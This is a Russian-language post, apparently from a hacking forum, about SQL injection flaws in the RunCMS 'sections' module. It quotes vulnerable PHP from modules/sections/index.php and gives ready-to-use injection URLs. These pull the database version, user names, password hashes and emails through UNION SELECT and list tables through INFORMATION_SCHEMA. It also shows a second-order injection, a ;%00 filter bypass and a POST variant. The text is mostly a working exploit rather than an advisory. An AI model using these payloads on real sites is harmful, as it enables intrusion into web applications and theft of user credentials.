Стандартный модуль sections (Статьи)
modules/sections/index.php
PHP код:
function listarticles($secid) {
global $rcxConfig, $rcxUser, $rcxModule, $sectionsConfig, $db, $myts, $_GET;
$access = new groupAccess('listarticles');
$access->loadGroups($secid, 'secid', _MI_NSECTIONS_TABLE);
if ( !$access->checkGroups(1) ) {
redirect_header("javascript:history.go(-1)", 3, _NOPERM);
exit();
}
$result = $db->query("SELECT secname, image FROM ".$db->prefix(_MI_NSECTIONS_TABLE)." WHERE secid=$secid");
list($secname, $image) = $db->fetch_row($result);
$secname = $myts->makeTboxData4Show($secname);
SQL
http://localhost/runcms/modules/sections/index.php?op=listarticles&secid=1+and+1=2+union+se lect+version(),2
--------------------------
modules/sections/index.php
PHP код:
function viewarticle($artid, $page) {
global $rcxUser, $rcxModule, $db, $myts, $rcxConfig, $meta, $page;
$access = new groupAccess('viewarticle');
$access->loadGroups($artid, 'artid', _MI_NSECCONT_TABLE);
if ( !$access->checkGroups(1) ) {
redirect_header("javascript:history.go(-1)", 3, _NOACTION);
exit();
}
if ( !isset($page) ) {
$db->query("UPDATE ".$db->prefix(_MI_NSECCONT_TABLE)." SET counter=counter+1 WHERE artid='$artid'");
}
$result = $db->query("SELECT artid, secid, title, author, date, content, allow_html, allow_smileys, allow_bbcode, counter FROM ".$db->prefix(_MI_NSECCONT_TABLE)." WHERE artid=$artid");
list($artid, $secid, $title, $author, $date, $content, $allow_html, $allow_smileys, $allow_bbcode, $counter) = $db->fetch_row($result);
$title = $myts->makeTboxData4Show($title);
$myts->setType('admin');
$content = $myts->makeTareaData4Show($content, $allow_html, $allow_smileys, $allow_bbcode);
$thisUser = new RcxUser($author);
if (!$thisUser->isActive()) {
$name = _MD_UNKNOWN;
} else {
$name = $thisUser->uname();
}
$result2 = $db->query("SELECT secid, secname FROM ".$db->prefix(_MI_NSECTIONS_TABLE)." WHERE secid=$secid");
list($secid, $secname) = $db->fetch_row($result2);
SQL
http://localhost/runcms/modules/sections/index.php?op=viewarticle&artid=1+and+1=2+union+sel ect+1,2,version(),4,5,user(),7,8,9,10
из поля 2 вывод попадает в переменную $secid, поэтому можно вставить иньекцию для второго запроса
SQL
http://localhost/runcms/modules/sections/index.php?op=viewarticle&artid=1+and+1=2+union+sel ect+1,"1+and+1=2+union+select+1,version()",3,4,5,6 ,7,8,9,10
--------------------------
Удобный многострочный вывод
/modules/sections/index.php
PHP код:
$result = $db->query("SELECT COUNT(*) FROM ".$db->prefix(_MI_NSECCONT_TABLE));
list($numrows) = $db->fetch_row($result);
if ($numrows > 0) {
$_GET['show'] ? $show = $_GET['show'] : $show = 0;
$limit = $sectionsConfig['article_limit'];
$result = $db->query("SELECT artid, title, byline, author, content, counter, date FROM ".$db->prefix(_MI_NSECCONT_TABLE)." WHERE secid=$secid", $limit, $show);
while (list($artid, $title, $byline, $author, $content, $counter, $date) = $db->fetch_row($result)) {
$title = $myts->makeTboxData4Show($title);
$byline = $myts->makeTboxData4Show($byline);
$content = $myts->makeTareaData4Show($content);
$thisUser = new RcxUser($author);
SQL
http://localhost/runcms/modules/sections/index.php?op=listarticles&secid=1+union+select+1,u name,pass,4,5,email,7+from+w1kj7jl__users
Количество строк для вывода берется из конфигурации (по умолчанию 10), можно просматривать порциями,
регулируя параметром show:
/index.php?op=listarticles&secid={SQL}&show=10
Массив $_GET фильтруется на наличие терминаторов
-- и
/*, но работает
;%00, если mq=off.
http://localhost/runcms/modules/sections/index.php?op=listarticles&secid=1+union+select+1,t able_schema,table_name,4,5,6,7+from+INFORMATION_SC HEMA.tables;%00
$secid воспринимается и через $_POST, пожалуй самый удобный вариант.
http://localhost/runcms/modules/sections/index.php?op=listarticles
post
secid=1+union+select+1,table_schema,table_name,4,5 ,6,7+from+INFORMATION_SCHEMA.tables+limit+0,300--